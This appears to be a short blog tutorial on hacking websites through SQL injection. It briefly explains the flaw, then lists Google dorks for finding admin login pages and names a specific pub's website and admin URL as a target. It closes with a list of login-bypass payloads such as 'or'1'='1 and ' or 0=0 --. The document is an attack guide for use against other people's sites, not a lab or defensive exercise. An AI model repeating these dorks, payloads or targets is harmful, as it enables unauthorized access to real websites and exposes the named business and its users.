
Simple SQL Injection Tutorial: How To Hack Web Site with SQL Strings/SQL Injection [very easy]

What Is SQL Injection?



SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements, or is not strongly typed and is thereby unexpectedly executed. Web pages that accept parameters from the user and use them to build a SQL query against the database are the targets. For example, a web page with a username and password field fires a SQL query on the database to check whether the user has entered a valid name and/or password. With SQL injection, it is possible to send a crafted username and/or password that changes the SQL query and thus grants something else.


Requirements:

  • First we need to find sites for hacking; to hack sites, we must know how to find them.

Basically, we use dorks to find sites.

Some Google dorks:
  1. "inurl:admin.asp"
  2. inurl:adminlogin.asp
  3. inurl:login/admin.asp
  4. inurl:read.php?=
  5. inurl:"ViewerFrame?Mode="
  6. inurl:index.php?id=
  7. inurl:trainers.php?id=
  8. inurl:buy.php?category=
  9. inurl:article.php?ID=

Now open google.com, copy any one dork from here, paste it into Google and click search; you will get many SQL-vulnerable sites.

So we have found sites. Now we need to find the admin login page of a site.

Now open the sites one by one, and you will get the admin login page.

Now we have done two steps: the first is finding vulnerable sites and the second is finding the admin login.

Now we come to the main tutorial about SQL strings/injection.

What are SQL strings?

When we put a SQL string into the admin login, the login panel cannot handle the query correctly and redirects you into the admin area.

For example, I found a site: http://www.roseandcrownrangeworthy.co.uk

and I found the admin login panel: http://www.roseandcrownrangeworthy.co.uk/admin-home.asp

First I tried username: admin and password: admin, but I did not get in.

But after I enter username: admin and password: 'or'1'='1
If the password does not work, try other passwords:

  • 'or'x'='x
  • ' or 'x'='x
  • ' or 0=0 --
  • " or 0=0 --
  • or 0=0 --
  • ' or 0=0 #


That's it, guys. If you run into a problem, please comment or contact me.
